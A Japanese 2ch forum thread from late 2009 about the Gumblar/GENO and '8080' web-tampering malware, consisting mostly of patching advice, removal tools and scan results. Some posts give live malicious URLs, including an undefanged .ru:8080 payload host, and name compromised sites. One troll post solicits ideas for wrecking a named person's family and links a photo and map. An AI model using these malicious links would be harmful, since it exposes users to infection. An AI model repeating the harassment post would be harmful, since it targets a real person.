【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊ 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ＊＊＊

【関連スレ】
GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/

【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
＊＊＊ 【注意！】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ＊＊＊
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

【8080系ウイルスについて】
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106

●IPA 情報処理推進機構
Windowsの自動実行（オートラン）機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと！
ttp://www.ipa.go.jp/security/txt/2009/05outline.html

・Microsoft Updateは確実に適用しましょう （*「カスタム」選択更新で適用にエラーが無いか？は確認出来ます）
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
　感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します

・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン（Webブラウザ拡張機能）の内容は把握しておきましょう
・ソフトウェアやブラウザ（Webプラグイン類も）の最新版Updateとセキュリティ設定を常に心掛けましょう
　（*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど）
　（*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する）

・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい （*VirusTotal.comスキャンを活用）
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう （*危険な餌に釣られない用心を持ちましょう）
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう （*IDセーフ機能も活用）

●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了　2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
ttp://internet.watch.impress.co.jp/docs/news/20090724_304366.html

＊＊＊ テンプレ終了 ＊＊＊

抜け、間違いがあれば指摘よろ

ごめん続けて

Norton +α Defense （Method of JAPAN Norton Forum）

・「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 （*常駐保護は無し *日本語インターフェイス ）
　 ttp://www.emsisoft.com/en/software/free/
　 サービス > 「a-squared Free Service」を無効 > 停止 > 適用で｢自動Update常駐 a2service.exe｣の停止＝手動Update
・「a-square MalAware 1.0」 クラウドスキャナ （*クイッククラウドチェック、a-squared Freeとの併用がベストです）
　 *インストール不要　*頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
　 ttp://www.emsisoft.com/en/software/malaware// （ttp://i46.tinypic.com/2gtnn2x.jpg
）
・「Malwarebytes' Anti-Malware 1.42」 ウイルス・スパイウェアのスキャンと駆除 （*常駐保護は無し *手動Update）
　 ttp://www.malwarebytes.org/mbam.php　（*「Protection」ページの機能はNortonとの共存の為に設定しないで下さい）

・「ReducedPermissions」 （手動Windows Updateやオンラインスキャンはエラーに *導入時には｢ブロックの解除｣設定を）
・「Spyware Blaster 4.2」 危険サイトの制限、危険ActiveXの実行制限処置 （*手動Update *Flash Killer機能も実用的です）

・「Live OneCare PC セーフティ （オンラインスキャン *駆除も可能 *月1・2回程度のチェックでOK）」
　 ttp://onecare.live.com/site/ja-jp/default.htm?s_cid=sah
・「a-squared HiJackFree 3.1」 ttp://www.hijackfree.com/en/ (*詳細な自己診断ビューア *日本語インターフェイス)
　 (*インストール後、歯車アイコンから一度アップデート → その後はオフでOK　ttp://i45.tinypic.com/3022nwz.jpg
)

■詐欺・罠サイトURLの報告 - Symantec Security Response 〔Report Suspected Phishing Sites〕
https://submit.symantec.com/antifraud/phish.cgi　（記入例 ttp://i38.tinypic.com/k1xhjm.jpg
）
　*ワンクリック詐欺や詐欺ソフトのダウンロードを仕向けるURLの報告（*複数の場合はenter moreで報告枠追加できます）
　*インターネット中に、奇妙な動作を感じたページや、悪意のある動画やゲーム系サイトの報告もOK
　*思わぬサイトへ飛ばされた場合などは、リンク元ボタンを右クリック > プロパティでURL確認

■未対応リスクや疑わしいファイルを検疫経由でSymantecへ送信 （*最大10MB以下？までのサイズ）
タスクトレーのNortonアイコンを右クリック「最近の履歴を表示」 > 「検疫」を選択
検疫に追加 （*明らかに未対応リスクである場合は、「ディスクからファイルを削除」にチェック（＝検疫と同時に削除））
検疫後、「詳細」 > 下列にある「処理」 > 「Symantecへ提出」をクリック
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi　（記入例 ttp://i36.tinypic.com/bhj8ye.jpg
）

■Nortonが誤検出してしまうファイルの報告 - Symantec Security Response 〔False Positive Submission〕
https://submit.symantec.com/dispute/false_positive/　（記入例 ttp://i38.tinypic.com/2itmwjs.jpg
）

●JVN iPedia -脆弱性対策情報データベース （*使用しているソフトウェアの最新版への更新を心掛けましょう）
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所（ウィークポイント）です
ttp://jvn.jp/report/index.html
■「ttp://www.virustotal.com/jp/」 （37社のファイルスキャンサービス *圧縮ファイルの状態でもOK）
■「ttp://onlinelinkscan.com」 （4種類のサイト安全性チェックを一度に　PhisTank ，AVG ，SiteTruth ，Google Safe Browsing）
■「ttp://www.gred.jp（セキュアブレイン gred）」 （国産サイト安全性チェックサービス … ワンクリ詐欺 ，Web攻撃の有無など）

「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
　Social Network Service ＝ さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
個人情報をさらすマルウェア、ポルノゲームのインストールファイルを装って流通している　2009/11/30
ttp://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html
ワンクリック不正請求トラブル、相談事例が半年で1万7794件　2009/12/4
ttp://internet.watch.impress.co.jp/docs/news/20091204_333169.html
Gumblar被害拡大中(3) 予防対策：一般ユーザーの方、サイト管理者の方へ　2009/12/11
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094

＊＊＊ テンプレ終了 ＊＊＊

いきなり荒らし？
>>9-11ってノートンスレのテンプレであって関係ないよな？

「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
Social Network Service：さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
セキュアブレインが、「Gumblerウイルス」と類似した新たな攻撃手法を確認　2009/10/23
企業に「gredセキュリティサービス　無償トライアル版」を利用し、自社ウェブサイトの検査を行うよう呼びかけ
ttp://antivirus-news.net/2009/10/gumbler.html
迷惑メールからあなたを守るためのチェックリスト　2009/11/10
tp://japan.zdnet.com/news/sec/story/0,2000056194,20403268,00.htm

「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査　2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
http://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい　2009/02/20
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち，最大で約4900本のコメント欄に，悪意あるWebページへのリンク　2009/05/25
http://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告　2009/08/27
http://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告　2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
http://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局（FBI）が、SNSを舞台にした犯罪が増えていると注意を呼びかけ　2009/10/2
Social Network Service：さまざまな参加呼びかけ型コミュニケーションサイト
http://www.computerworld.jp/topics/vs/163829.html
ネット検索は信用できない？ ユーザー詐称する広告代理店を処罰　2009/10/28
盗んだ個人情報で4900個ものアカウントを作り、一般ユーザーのふりをして「ここがよかったよ〜」と、
特定のお店やWebサイトの宣伝をしていた。つまり、私達が利用したのは知識検索ではなく広告検索だった
ttp://pc.nikkeibp.co.jp/article/column/20091028/1019904/
ミクシィ、４２００人情報"露出"…ゲーム課金不具合　2009/11/04
実際に制作・運営しているのは中国のゲーム会社「リクー・メディア」
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20091104-OYT8T00323.htm

【ヤフオク】Nortonキー出品まとめ�A・悪い評価
■fantastic_kids_1999
特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。
結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時：2009年 6月 13日 15時 11分)
■intelli2009
プロダクトキーが使えなくなり、有効期間も０日に…詐欺でしょうか？(評価日時：2009年 9月 17日 7時 03分)
■number2009livecn（停止中）
期限切れ (評価日時：2009年 11月 5日 11時 08分)
■uxk1216
落札当初、２年間の有効期限と説明を受けていたが、３ヶ月目で更新期限切れが来てしまいました、
どういう事でしょうか？ (評価日時：2009年 10月 25日 22時 24分)
■min9763557（停止中）
購入時は認証できましたが、３ヶ月もせず期限切れになりました。許せません。 (評価日時：2009年 11月 12日 17時 29分)
■yuanchong525
こいつはすぐに期限が切れるものを売りつけてます。詐欺です。
まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時：2009年 9月 13日 22時 49分)
■seven_stars_king2000
Yahoo! JAPAN IDが無効です。
■andriy_shevchenko1976929
Yahoo! JAPAN IDが無効です。
■bottega_choice（停止中）
落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時：2009年 10月 20日 17時 03分)
■wxk1216（停止中）
海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時：2009年 10月 7日 21時 41分)

　 　　　　　　 　　　＿＿＿_
　 　ｎ　　　　　　／⌒　　⌒＼
　 　| |　　　　／（ ＞） 　（＜）＼
　 i｢|^|^ﾄ、／::::::⌒（__人__）⌒::::＼ >>1乙だお！
　|: ::　 ! } |　　　　/| | | | |　　　　　 |
　 ヽ　　,ｲ ＼　 (、`ー―'´,　　 　／

いきなり嵐にはわろうた

あかかげまるの家庭を壊す案を広く募集いたしております。
http://www014.upp.so-net.ne.jp/BANBI/png/top.png
ちなみに地図はこちらです。
http://www.mapion.co.jp/m/34.6591819444444_135.453802777778_9/

>>1乙

8080(/*GNU GPL*/ や /*CODE1*/）って
いまのところ検知するのノートンとAVASTだけなの？
他のソフトはスキャンでもスルー？

>>20
カスペも検知する。

>>21
(/*GNU GPL）踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど

8080系で>>4みたいな感染確認は無いですかね？

スクリプトをいくつか踏んでみたけど、どうもまちまちみたい
定義ファイルの結果だから実際はもう少し検出するだろうけど
日付はindex.htmlのもの

/*GNU GPL*/
24日　結果: 7/41
ttp://www.virustotal.com/jp/analisis/c2c5b1338529ba08848f0f25c4e8119d52e7dfcab3358b55619e38232f8af827-1261897615
26日　結果: 0/41
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261896683

/*CODE1*/
22日　結果: 9/41
ttp://www.virustotal.com/jp/analisis/30bd85a231595bbee6fad3b8fa1b1931d6851c6187ca0f55d61a51b07975d38a-1261896524

>>23
一例としてsiszyd32.exeをスタートアップに登録するみたいだ
もっともこれが他のウイルスを呼び込むから
感染してたらどうなっているやら・・・

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
ttp://htlogs.com/what-is-siszyd32-exe-how-to-remove-siszyd32-exe/

感染の疑いがある場合はAvastとか検出報告のあるソフトで試してみるしか確認も出来ないってことですか？
ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが
やはり黒でしょうか

>>26
avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな？

PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな

>>27
そうですか･･･
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
（トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ）
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません

確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが

あ、あとsymantecのポートチェックもやりましたがこっちは全部白でした
（8080系のポートはチェック対象外のようでした）

>>28
それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず

>>30
いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
（偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず）
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして

ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません

IEでJAVAスクオンで踏んだんですが、何故生き残ったのか･･･
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました

>>24
ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない

つまり一度感染したらAVAST以外で確かめる術がないってこと？
でもAVASTも誤検出騒ぎで落ち着かないよな
どうすりゃいいんだ

>>33
感染後のことは知らない
あくまでもスクリプトのスキャンの話

>>34
ああそうか、スマン読み違えてた

>>33
どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく

どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る

>>36
いや感染（疑い）後の話よ
どのスキャンでも上がってこないらしいじゃん

あとはHIPSの強力なファイアウォールなどのセキュリティ製品を使う
設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる
確証はないがほぼ防げるんじゃないだろうか
Outpost、Comodo、Online Armor、PC toolsなど

>>37
感染後はどうなるのかと言う情報ある？

>>37
そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能！とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし

あと肝心なことは
感染してもすぐに復旧できるようにバックアップを取っておく

>>39
ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか

8080系はいわゆるダウンローダーで
次々にウイルスをダウンロードしては実行するので
感染したが最後、収拾がつかなくなるはず

だからダウンローダーを削除しても他のウイルスに
感染している可能性が高い
ある意味Gumblarよりたちが悪い

ここの下あたりに動作が記載されてる
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

webサイトを管理してるなら
パスワードを変更するのも忘れずに

感染しても今のところweb改竄の被害を受けるだけなのかな
俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな

view-source:http://digimaga.net/

<script>/*GNU GPL*/・・

デジマガ、アウト。

試す環境がある人でも2回目のアクセスの時は404返すようになったりと素晴らしい工夫がなされてたりして
検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・


>>44
パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしｗ

8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2104
>ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。

>>45
志村ー、URLURL

>>45
貼っちまったよ・・。
対策ない奴は、絶対開くなよ。

>>46
分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが

分かってないのか分かってるのか微妙な文章だｗ
最後はこういうウイルスの一般的な動作を述べてるだけじゃないか

レスした後再度読み直してみたら、微妙な文章ですね・・・
まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・

>>45
ＪＲ東日本のサイト改ざん。『/*GNU GPL*/』の不正なJavaScriptコード
http://blogs.yahoo.co.jp/noooo_spam/59306006.html

コレと一緒っぽいな。

万一に備えてシステムをバックアップ
True Imageなどのシステムをバックアップするソフトがない場合

お薦めフリーソフト

Paragon Backup & Recovery 10 Free Edition
http://www.paragon-software.com/home/db-express/index.html
起動メディアを作っておけば起動メディアから復元はもちろんバックアップも出来る

Macrium Reflect FREE Edition
http://www.macrium.com/ReflectFree.asp

EASEUS Todo Backup
http://www.todo-backup.com/

たしかアニたまのサイトもそれだった気がするんだが
あんまり大きな騒ぎにはならなかったよな
潜伏してるのが多いのか？

今騒ぎになってきてるじゃないですか。ゼロデイ突いてくるドライブバイダウンロードが有名サイトにぞくぞくとってことで

adobeもjavascriptとか最初から危なっかしいの分かるような機能入れるなよ
ちゃんと対応できるならまだしも全然駄目じゃないか
アホすぎ

>>45
セーフだろうが。嘘を書くなよ

>>57
まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな？

ね、URLそのまま晒すとこんな奴出てくるでしょ。>>57
晒すときは>>1をよく読もう
>＊＊＊ 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ＊＊＊

>>56
そしてその危なっかしいものを有効活用しているところがあるという・・・
ttp://slashdot.jp/security/comments.pl?sid=441912&threshold=1&commentsort=3&mode=thread&pid=1526692#1526854

>>58
自己レス
http://digimaga●net/

開くと、JREが起動して、アクセスに行こうとするな。ロシアのサイト。

デジマガ/*GNU GPL*/あるな
で、>>57は踏んだのか？　どうなった？

>>61
ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080

やられてるだろ。これ。

>>61
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。

まぁ確実かな。

pdfupd.exeが落ちてくる
virustotalではどれも検出しない

>>62-63
普通踏んだら速攻で（この場合はロシアから）何か運んでくるものなの？
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね

pdfupd.exeを実行する何かダウンロードして
_ex-68.exeを実行しようとするのでこの辺でやめといた

>>65
いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所

>>64.66
どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな

>>65
踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが

>>68
「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。

>>70
いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな

もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない

実行ファイルも残らないの？
セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな
バカでゴメン

>>72
テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた

最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ

>>73
そっか･･･ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ

難読化といてみると、ただJSを落としてるだけっぽいな。
他のJSをダウンロードしてる先が、ロシアってことか。

そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。

>>45
今Aviraで試したらwebguardが検出した。
URL "http://adsrevenue-net.king.com.newgrounds-com.themobilewindow.ru:8080/pics/win.jpg" のデータにアクセスする際に、
ウイルスまたは不要なプログラム 'EXP/DirektShow.A' [exploit] が検出されました。

あ、ごめん
直リンしちまったじゃねえか

>>76
はウイルス
注意

pdfupd.exeってやつ
http://www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261910241
http://www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261933023
http://anubis.iseclab.org/?action=result&task_id=1596ebc77b0f8b50455c2be30bccc5450&format=html


同じURLから27日午前9時頃拾ったやつ
http://www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261872557
http://www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261903328

pdfupd.exe って名前から判断して、またAdobeReaderの脆弱性か？。

たしかコレって、ゼロデイの可能性ありってやつじゃなかったか？
http://www.adobe.com/support/security/advisories/apsa09-07.html

これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。

>>79
あんた、ちょっと遅れてる・・・・

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106

Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起（JPCERT/CC）
ttps://www.jpcert.or.jp/at/2009/at090027.txt

>>79
マイクロソフトのActiveX
MS09-032あたりじゃないかな

>>80
ありゃ。やっぱゼロデイか。PDF切っとくか。

>>82
pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで

今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと
Adobe Readerがインストールされていれば違った攻撃もあるかも知れない

>>78みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと？

GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど

上にもあるように
ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが

>>78はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし

ただ
>分かり易い症状もないってこと？
これはYesって言っといた方が対策する人も増えるか？

ごめん
AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない

>>76
WebGuardなくてもAviraで検出することを確認

>>24
自己レス
avast!がスクリプトに対応

/*GNU GPL*/
26日　結果: 1/41
Avast　4.8.1351.0　2009.12.27　JS:Illredir-B
